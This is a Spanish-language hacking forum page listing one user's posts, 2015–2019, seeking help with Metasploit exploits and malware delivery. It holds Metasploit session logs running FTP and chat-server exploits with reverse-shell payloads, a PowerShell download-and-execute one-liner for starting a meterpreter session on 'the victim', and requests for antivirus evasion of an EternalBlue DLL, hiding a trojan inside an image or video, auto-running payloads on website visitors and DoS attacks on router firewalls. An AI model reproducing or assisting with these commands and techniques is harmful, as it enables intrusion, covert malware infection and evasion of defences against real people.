Gracias!!! LO VOY A PROBAR Y LUEGO COMENTO!
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Dudas y pedidos generales / Re:Eternalblue & double_pulsar ayuda!!!!
Enero 15, 2019, 08:11:49 AM
Gracias por tu respuesta, pero estoy utilizando el mismo módulo que mencionás. Al utilizarlo crea el dll y lo inyecta (según tengo entendido). Lo que no sé es como modificar el dll con los encoders. Ya que si yo modifico el dll, cuand ejecute nuevamente el exploit se va a generar un nuevo dll y va a reemplazar el mío!
#3
Dudas y pedidos generales / Eternalblue & double_pulsar ayuda!!!!
Enero 14, 2019, 07:16:18 PM
Hola a todos,
Quería rpeguntar si alguien sabe como hacer para que el antivirus no detecte el archivo eternal11.dll generado por {este exploit ya que cuando lo detecta interrumpe la conexión! Estuve viendo que metasploit tiene un encoder dentro de las opciones de éste exploit, pero no se bien como usarlo o como combinar los diferecntes encoders! Si alguine me puede ayudar se lo agradeceré! Saludos!
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > show encoders
Compatible Encoders
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
generic/eicar manual No The EICAR Encoder
generic/none normal No The "none" Encoder
x64/xor normal No XOR Encoder
x64/xor_dynamic normal No Dynamic key XOR Encoder
x64/zutto_dekiru manual No Zutto Dekiru
x86/add_sub manual No Add/Sub Encoder
x86/alpha_mixed low No Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low No Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual No Avoid underscore/tolower
x86/avoid_utf8_tolower manual No Avoid UTF8/tolower
x86/bloxor manual No BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual No BMP Polyglot
x86/call4_dword_xor normal No Call+4 Dword XOR Encoder
x86/context_cpuid manual No CPUID-based Context Keyed Payload Encoder
x86/context_stat manual No stat(2)-based Context Keyed Payload Encoder
x86/context_time manual No time(2)-based Context Keyed Payload Encoder
x86/countdown normal No Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal No Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal No Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low No Non-Alpha Encoder
x86/nonupper low No Non-Upper Encoder
x86/opt_sub manual No Sub Encoder (optimised)
x86/service manual No Register Service
x86/shikata_ga_nai excellent No Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual No Single Static Bit
x86/unicode_mixed manual No Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual No Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal No Dynamic key XOR Encoder
Quería rpeguntar si alguien sabe como hacer para que el antivirus no detecte el archivo eternal11.dll generado por {este exploit ya que cuando lo detecta interrumpe la conexión! Estuve viendo que metasploit tiene un encoder dentro de las opciones de éste exploit, pero no se bien como usarlo o como combinar los diferecntes encoders! Si alguine me puede ayudar se lo agradeceré! Saludos!
msf > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(windows/smb/eternalblue_doublepulsar) > show encoders
Compatible Encoders
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
generic/eicar manual No The EICAR Encoder
generic/none normal No The "none" Encoder
x64/xor normal No XOR Encoder
x64/xor_dynamic normal No Dynamic key XOR Encoder
x64/zutto_dekiru manual No Zutto Dekiru
x86/add_sub manual No Add/Sub Encoder
x86/alpha_mixed low No Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper low No Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower manual No Avoid underscore/tolower
x86/avoid_utf8_tolower manual No Avoid UTF8/tolower
x86/bloxor manual No BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot manual No BMP Polyglot
x86/call4_dword_xor normal No Call+4 Dword XOR Encoder
x86/context_cpuid manual No CPUID-based Context Keyed Payload Encoder
x86/context_stat manual No stat(2)-based Context Keyed Payload Encoder
x86/context_time manual No time(2)-based Context Keyed Payload Encoder
x86/countdown normal No Single-byte XOR Countdown Encoder
x86/fnstenv_mov normal No Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive normal No Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low No Non-Alpha Encoder
x86/nonupper low No Non-Upper Encoder
x86/opt_sub manual No Sub Encoder (optimised)
x86/service manual No Register Service
x86/shikata_ga_nai excellent No Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual No Single Static Bit
x86/unicode_mixed manual No Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual No Alpha2 Alphanumeric Unicode Uppercase Encoder
x86/xor_dynamic normal No Dynamic key XOR Encoder
#4
Dudas y pedidos generales / Re:Ocultar Troyano
Octubre 25, 2015, 02:46:22 PM
Muchas gracias por la info!
Voy a probar las distintas técnicas y comento como me ha ido!
Voy a probar las distintas técnicas y comento como me ha ido!
#5
Dudas y pedidos generales / Ocultar Troyano
Octubre 25, 2015, 01:15:51 AM
Hola gente,
Utilizando Vail-Evasion generé un troyano indetectable a los AV en formato .exe. Quisiera saber que programa me recomiendan para fusionar éste ejecutable a otro archivo (por ejemplo una imagen o video), y que éste se pueda ejecutar en forma oculta al abrir dicho archivo.
Muchas gracias!
Utilizando Vail-Evasion generé un troyano indetectable a los AV en formato .exe. Quisiera saber que programa me recomiendan para fusionar éste ejecutable a otro archivo (por ejemplo una imagen o video), y que éste se pueda ejecutar en forma oculta al abrir dicho archivo.
Muchas gracias!
#6
Dudas y pedidos generales / Re:Exploit FreeFloat
Octubre 23, 2015, 02:55:30 PM
Si, estaba en modo start corriendo en el puerto 21. Comienza a subir el archivo SxofqwKjdO.exe, se autentica en forma correcta y queda colgado. La prueba la realicé sobre una máquina virtual. Tal vez tenga q ver con algún error de config en la máquina virtual
#7
Dudas y pedidos generales / Re:Exploit FreeFloat
Octubre 23, 2015, 12:26:45 PM
Si, la versión es exactamente la misma q aparece en los targets del exploit.
#8
Dudas y pedidos generales / Re:Exploit FreeFloat
Octubre 23, 2015, 11:30:40 AM
El puerto está abierto con firewall desactivado.
#9
Dudas y pedidos generales / Web_delivery
Octubre 17, 2015, 05:34:01 PM
Hola,
Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit
Estuve viendo algunos tutoriales sobre el script de Metasploit web_delivery.
Luego de lanzar el exploit, queda a la escucha:
msf exploit(web_delivery) > exploit
- Exploit running as background job.
- Started HTTP reverse handler on No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
msf exploit(web_delivery) > - Using URL: No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
- Local IP: No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
- Server started.
- Run the following command on the target machine:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))
Estuve viendo que del lado de la victima hay que ejecutar el siguiente código para iniciar una sesión de meterpreter:
powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('No tienes permitido ver los links. Registrarse o Entrar a mi cuenta'))
Ví que lo hacen vía CMD. También probé con un archivo .BAT y funcionó.
Mi duda es si hay alguna forma automática para que se ejecute el código. Ya que es muy díficil que la victima copie el código y lo ejecute en CMD, no?
Si alguien tiene alguna idea se lo agradezco!
#10
Dudas y pedidos generales / Ejecutar Payload desde servidor web
Octubre 15, 2015, 12:23:37 AM
Hola, quería saber de que forma puedo ejecutar en forma automática un Payload desde mi servidor web sin que sea mediante java.
Por ejemplo, he creado un Payload con veil-evasion. Quisiera subirlo a mi web y en el momento en que la victima se conecte a ella se ejecute el Payload automáticamente.
Por ejemplo, he creado un Payload con veil-evasion. Quisiera subirlo a mi web y en el momento en que la victima se conecte a ella se ejecute el Payload automáticamente.
#11
Dudas y pedidos generales / Exploit FreeFloat
Octubre 10, 2015, 09:51:13 PM
Hola Gente,
Tengo instalado en una máquina virtual con SO windows / el programa vulnerable FreeFloat.
Cuando lanzo el exploit desde metasploit realiza todos los procesos y no se logra la conexión. Alguien puede ayudarme?
msf > use exploit/windows/ftp/freefloatftp_wbem
msf exploit(freefloatftp_wbem) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(freefloatftp_wbem) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(freefloatftp_wbem) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(freefloatftp_wbem) > exploit
Tengo instalado en una máquina virtual con SO windows / el programa vulnerable FreeFloat.
Cuando lanzo el exploit desde metasploit realiza todos los procesos y no se logra la conexión. Alguien puede ayudarme?
msf > use exploit/windows/ftp/freefloatftp_wbem
msf exploit(freefloatftp_wbem) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(freefloatftp_wbem) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(freefloatftp_wbem) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf exploit(freefloatftp_wbem) > exploit
- Exploit running as background job.
- Started reverse handler on 192.168.1.102:4444
msf exploit(freefloatftp_wbem) > - Server started.
- 192.168.1.106:21 - Trying to upload SxofqwKjdO.exe
- 192.168.1.106:21 - Sending empty login...
- 192.168.1.106:21 - Empty authentication was successful
- 192.168.1.106:21 - Set binary mode
- 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"
- 192.168.1.106:21 - Trying to upload pvzBH.mof
- 192.168.1.106:21 - Sending empty login...
- 192.168.1.106:21 - Empty authentication was successful
- 192.168.1.106:21 - Set binary mode
- 192.168.1.106:21 - Set active mode "192,168,1,102,31,144"
msf exploit(freefloatftp_wbem) >
#12
Dudas y pedidos generales / Re:Exploit TurboFTP_port
Octubre 09, 2015, 04:39:48 PMModule options (exploit/windows/ftp/turboftp_port):
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS admin no The password for the specified username
FTPUSER admin no The username to authenticate as
RHOST 192.168.1.106 yes The target address
RPORT 21 yes The target port
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.1.102 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(turboftp_port) >
msf exploit(turboftp_port) > exploit
- Started reverse handler on 192.168.1.102:4444
- Automatically detecting the target
- Selected Target: Windows Universal TurboFtp 1.30.826[/b]
msf exploit(turboftp_port) >
#13
Dudas y pedidos generales / Metasploitable 2 - Ayuda!
Octubre 07, 2015, 12:42:49 AM
Hola,
Tengo instalado en una máquina virtual Metasploitable 2. Realicé un escaneo de vulnerabilidades con Openvas desde Kali Linux. Encontré la siguiente vulnerabilidad:
Samba 'TALLOC_FREE()' Function Remote Code Execution Vulnerability
References
CVE: CVE-2015-0240
BID: 72711
CERT: DFN-CERT-2015-0253 , DFN-CERT-2015-0237
Other: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descargué el exploit adecuado para dicha vulnerabilidad:
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
Cuando lo ejecuto desde la terminal de Kali me dá el siguiente error:
root@R:~/Descargas# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -h
usage: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta [-h] [-hs HEAP_START] [-pa PAYLOAD_ADDR]
[-sps START_PAYLOAD_SIZE]
target
Samba CVE-2015-0240 exploit
positional arguments:
target target IP address
optional arguments:
-h, --help show this help message and exit
-hs HEAP_START, --heap_start HEAP_START
heap address in hex to start bruteforcing
-pa PAYLOAD_ADDR, --payload_addr PAYLOAD_ADDR
exact payload (accountName) address in heap. If this
is defined, no heap bruteforcing
-sps START_PAYLOAD_SIZE, --start_payload_size START_PAYLOAD_SIZE
start payload size for bruteforcing heap address in
KB. (128, 256, 512, ...)
root@R:~/Descargas# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 192.168.1.101
[-] seems not vulnerable
root@R:~/Descargas#
Alguien puede decirme que es lo que estoy haciendo mal?
Muchas gracias!
Tengo instalado en una máquina virtual Metasploitable 2. Realicé un escaneo de vulnerabilidades con Openvas desde Kali Linux. Encontré la siguiente vulnerabilidad:
Samba 'TALLOC_FREE()' Function Remote Code Execution Vulnerability
References
CVE: CVE-2015-0240
BID: 72711
CERT: DFN-CERT-2015-0253 , DFN-CERT-2015-0237
Other: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Descargué el exploit adecuado para dicha vulnerabilidad:
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
Cuando lo ejecuto desde la terminal de Kali me dá el siguiente error:
root@R:~/Descargas# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -h
usage: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta [-h] [-hs HEAP_START] [-pa PAYLOAD_ADDR]
[-sps START_PAYLOAD_SIZE]
target
Samba CVE-2015-0240 exploit
positional arguments:
target target IP address
optional arguments:
-h, --help show this help message and exit
-hs HEAP_START, --heap_start HEAP_START
heap address in hex to start bruteforcing
-pa PAYLOAD_ADDR, --payload_addr PAYLOAD_ADDR
exact payload (accountName) address in heap. If this
is defined, no heap bruteforcing
-sps START_PAYLOAD_SIZE, --start_payload_size START_PAYLOAD_SIZE
start payload size for bruteforcing heap address in
KB. (128, 256, 512, ...)
root@R:~/Descargas# python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 192.168.1.101
[-] seems not vulnerable
root@R:~/Descargas#
Alguien puede decirme que es lo que estoy haciendo mal?
Muchas gracias!
#14
Dudas y pedidos generales / Re:Exploit TurboFTP_port
Octubre 04, 2015, 10:24:10 AM
Firewall desactivado y conexión correcta!
Pero el exploit no funciona!
Pero el exploit no funciona!
#15
Dudas y pedidos generales / Exploit TurboFTP_port
Octubre 04, 2015, 12:13:53 AM
Hola gente,
Tengo un servidor ftp vulnerable en una máquina virtual.
Cuando ejecuto el exploit desde metasploit me dá el siguiente error:
msf > use exploit/windows/ftp/turboftp_port
msf exploit(turboftp_port) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(turboftp_port) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(turboftp_port) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(turboftp_port) > set LPORT 4444
LPORT => 4444
msf exploit(turboftp_port) > exploit
Tengo un servidor ftp vulnerable en una máquina virtual.
Cuando ejecuto el exploit desde metasploit me dá el siguiente error:
msf > use exploit/windows/ftp/turboftp_port
msf exploit(turboftp_port) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(turboftp_port) > set RHOST 192.168.1.104
RHOST => 192.168.1.104
msf exploit(turboftp_port) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(turboftp_port) > set LPORT 4444
LPORT => 4444
msf exploit(turboftp_port) > exploit
- Started reverse handler on 192.168.1.102:4444
- Automatically detecting the target
- Selected Target: Automatic
[-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
msf exploit(turboftp_port) >
Alguien puede ayudarme a resolverlo?
Grs
#16
Hacking / Re:[PENTESTING] [METASPLOIT] [BASIC] Tipos de escaneo
Octubre 01, 2015, 04:31:09 PM
Muy buena la explicación! Dos preguntas: 1- Si el puerto está abierto y filtrado, como hago para conocer q servicio está corriendo en ese puerto? y 2- una vez que conozco el servicio, al lanzar un exploit contra él, el firewall permite la conexión?
#17
Dudas y pedidos generales / Ataque DoS al firewall del router
Octubre 01, 2015, 09:03:10 AM
Hola, quería saber si hay forma de realizar en forma remota un ataque DoS al firewall del router y de esa manera poder escanear sus puertos sin que sean filtrados.
Si es que se puede agradecería un ejemplo.
Si es que se puede agradecería un ejemplo.
#18
Dudas y pedidos generales / Re:Redireccionamiento de dominio
Octubre 01, 2015, 08:38:15 AM
Grs x tu respuesta. Quisiera preguntarte algo màs respecto al router, hay forma de realizar un ataque DoS en forma remota para inactivar al firewall de router?
#19
Dudas y pedidos generales / Re:Ayuda con exploit de metasploit!!!!
Septiembre 30, 2015, 05:25:11 PM
Perdón por mi ignorancia, pero para hacer uso de algún encoder en el exploit citado, tengo que editar el código del exploit? Podrías orientarme un poco?
#20
Dudas y pedidos generales / Re:Ayuda con exploit de metasploit!!!!
Septiembre 30, 2015, 02:23:07 PM
Probé con diferentes PAYLOADs y persiste el error:
msf > use exploit/windows/misc/achat_bof
msf exploit(achat_bof) > set lhost 192.168.0.136
lhost => 192.168.0.136
msf exploit(achat_bof) > set RHOST 192.168.0.156
RHOST => 192.168.0.156
msf exploit(achat_bof) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(achat_bof) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(achat_bof) >
Alguna sugerencia?
msf > use exploit/windows/misc/achat_bof
msf exploit(achat_bof) > set lhost 192.168.0.136
lhost => 192.168.0.136
msf exploit(achat_bof) > set RHOST 192.168.0.156
RHOST => 192.168.0.156
msf exploit(achat_bof) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(achat_bof) > exploit
[-] Exploit failed: No encoders encoded the buffer successfully.
msf exploit(achat_bof) >
Alguna sugerencia?